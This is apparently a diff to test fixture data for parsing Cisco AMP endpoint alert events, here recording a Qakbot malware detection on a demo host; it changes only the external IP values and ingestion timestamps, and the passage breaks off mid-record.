"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":14930696955218,\"timestamp\":1610656706,\"timestamp_nanoseconds\":844899579,\"date\":\"2021-01-14T20:38:26+00:00\",\"event_type\":\"Executed malware\",\"event_type_id\":1107296272,\"detection\":\"W32.E4FCCBFA69-95.SBX.TG\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610656706,\"start_date\":\"2021-01-14T20:38:26+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"},\"parent\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"}}}}}", "code": "1107296272", "kind": "alert", "start": "2021-01-14T20:38:26.000Z", @@ -140,7 +140,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { @@ -184,7 +184,7 @@ "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -194,8 +194,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025208580Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412680266518626000,\"timestamp\":1610655485,\"timestamp_nanoseconds\":587000000,\"date\":\"2021-01-14T20:18:05+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6412680266518626319\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"}}}}", + "ingested": "2021-12-09T13:35:39.763782800Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412680266518626000,\"timestamp\":1610655485,\"timestamp_nanoseconds\":587000000,\"date\":\"2021-01-14T20:18:05+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6412680266518626319\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"}}}}", "code": "2164260880", "kind": "alert", "action": "Quarantine Failure", @@ -215,7 +215,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -260,7 +260,7 @@ "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -270,8 +270,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025210946Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412680266518626000,\"timestamp\":1610655485,\"timestamp_nanoseconds\":494000000,\"date\":\"2021-01-14T20:18:05+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6412680266518626317\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"}}}}", + "ingested": "2021-12-09T13:35:39.763788800Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412680266518626000,\"timestamp\":1610655485,\"timestamp_nanoseconds\":494000000,\"date\":\"2021-01-14T20:18:05+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6412680266518626317\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"}}}}", "code": "2164260880", "kind": "alert", "action": "Quarantine Failure", @@ -291,7 +291,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -350,7 +350,7 @@ "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -367,8 +367,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025213319Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412680266518626000,\"timestamp\":1610655485,\"timestamp_nanoseconds\":587000000,\"date\":\"2021-01-14T20:18:05+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.E4FCCBFA69-95.SBX.TG\",\"detection_id\":\"6412680266518626319\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"28242311.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\28242311.exe\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"},\"parent\":{\"process_id\":7120,\"disposition\":\"Malicious\",\"file_name\":\"QuotaGroup.exe\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\",\"sha1\":\"f504774b72acfb23a46217aec9c6559fd7e4df64\",\"md5\":\"b5ede95ec8bc4ad6984758be42b152bd\"}}}}}", + "ingested": "2021-12-09T13:35:39.763794800Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412680266518626000,\"timestamp\":1610655485,\"timestamp_nanoseconds\":587000000,\"date\":\"2021-01-14T20:18:05+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.E4FCCBFA69-95.SBX.TG\",\"detection_id\":\"6412680266518626319\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"28242311.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\28242311.exe\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"},\"parent\":{\"process_id\":7120,\"disposition\":\"Malicious\",\"file_name\":\"QuotaGroup.exe\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\",\"sha1\":\"f504774b72acfb23a46217aec9c6559fd7e4df64\",\"md5\":\"b5ede95ec8bc4ad6984758be42b152bd\"}}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -390,7 +390,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { @@ -444,7 +444,7 @@ "f504774b72acfb23a46217aec9c6559fd7e4df64" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -461,8 +461,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025215615Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412680266518626000,\"timestamp\":1610655485,\"timestamp_nanoseconds\":572000000,\"date\":\"2021-01-14T20:18:05+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.E4FCCBFA69-95.SBX.TG\",\"detection_id\":\"6412680266518626318\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"QuotaGroup.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\QuotaGroup\\\\QuotaGroup.exe\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\",\"sha1\":\"f504774b72acfb23a46217aec9c6559fd7e4df64\",\"md5\":\"b5ede95ec8bc4ad6984758be42b152bd\"}}}}", + "ingested": "2021-12-09T13:35:39.763799500Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412680266518626000,\"timestamp\":1610655485,\"timestamp_nanoseconds\":572000000,\"date\":\"2021-01-14T20:18:05+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.E4FCCBFA69-95.SBX.TG\",\"detection_id\":\"6412680266518626318\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"QuotaGroup.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\QuotaGroup\\\\QuotaGroup.exe\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\",\"sha1\":\"f504774b72acfb23a46217aec9c6559fd7e4df64\",\"md5\":\"b5ede95ec8bc4ad6984758be42b152bd\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -484,7 +484,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -537,7 +537,7 @@ "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -554,8 +554,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025217859Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412680266518626000,\"timestamp\":1610655485,\"timestamp_nanoseconds\":494000000,\"date\":\"2021-01-14T20:18:05+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.E4FCCBFA69-95.SBX.TG\",\"detection_id\":\"6412680266518626317\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"28242311.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\28242311.exe\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"},\"parent\":{\"process_id\":4788,\"disposition\":\"Malicious\",\"file_name\":\"28242311.exe\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"}}}}}", + "ingested": "2021-12-09T13:35:39.763804100Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412680266518626000,\"timestamp\":1610655485,\"timestamp_nanoseconds\":494000000,\"date\":\"2021-01-14T20:18:05+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.E4FCCBFA69-95.SBX.TG\",\"detection_id\":\"6412680266518626317\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"28242311.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\28242311.exe\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"},\"parent\":{\"process_id\":4788,\"disposition\":\"Malicious\",\"file_name\":\"28242311.exe\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"}}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -577,7 +577,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { @@ -631,7 +631,7 @@ "f504774b72acfb23a46217aec9c6559fd7e4df64" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -648,8 +648,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025220104Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412680266518626000,\"timestamp\":1610655485,\"timestamp_nanoseconds\":478000000,\"date\":\"2021-01-14T20:18:05+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.E4FCCBFA69-95.SBX.TG\",\"detection_id\":\"6412680266518626316\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"28242311.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\28242311.exe\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\",\"sha1\":\"f504774b72acfb23a46217aec9c6559fd7e4df64\",\"md5\":\"b5ede95ec8bc4ad6984758be42b152bd\"}}}}", + "ingested": "2021-12-09T13:35:39.763807800Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412680266518626000,\"timestamp\":1610655485,\"timestamp_nanoseconds\":478000000,\"date\":\"2021-01-14T20:18:05+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.E4FCCBFA69-95.SBX.TG\",\"detection_id\":\"6412680266518626316\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"28242311.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\28242311.exe\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\",\"sha1\":\"f504774b72acfb23a46217aec9c6559fd7e4df64\",\"md5\":\"b5ede95ec8bc4ad6984758be42b152bd\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -671,7 +671,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -712,7 +712,7 @@ "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -722,8 +722,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025222302Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412680266518626000,\"timestamp\":1610655485,\"timestamp_nanoseconds\":587000000,\"date\":\"2021-01-14T20:18:05+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6412680266518626318\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"}}}}", + "ingested": "2021-12-09T13:35:39.763812600Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412680266518626000,\"timestamp\":1610655485,\"timestamp_nanoseconds\":587000000,\"date\":\"2021-01-14T20:18:05+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6412680266518626318\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"}}}}", "code": "553648143", "kind": "alert", "action": "Threat Quarantined", @@ -743,7 +743,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -784,7 +784,7 @@ "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -794,8 +794,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025224554Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412680266518626000,\"timestamp\":1610655485,\"timestamp_nanoseconds\":494000000,\"date\":\"2021-01-14T20:18:05+00:00\",\"event_type\":\"Threat 